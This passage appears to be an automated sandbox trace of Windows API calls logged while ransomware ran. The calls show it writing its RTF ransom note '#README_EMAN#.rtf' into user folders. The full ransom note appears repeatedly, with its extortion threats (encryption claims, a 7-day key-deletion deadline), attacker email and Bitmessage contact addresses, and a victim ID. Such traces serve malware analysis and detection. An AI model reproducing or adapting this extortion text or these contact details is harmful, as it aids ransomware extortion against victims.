tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0292.101] WriteFile (in: hFile=0x2e8, lpBuffer=0x1eecea8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1eecea8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0292.102] CloseHandle (hObject=0x2e8) returned 1 [0292.102] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\#readme_eman#.rtf")) returned 0xffffffff [0292.102] GetLastError () returned 0x2 [0292.102] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\hr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2e8 [0292.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.103] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd 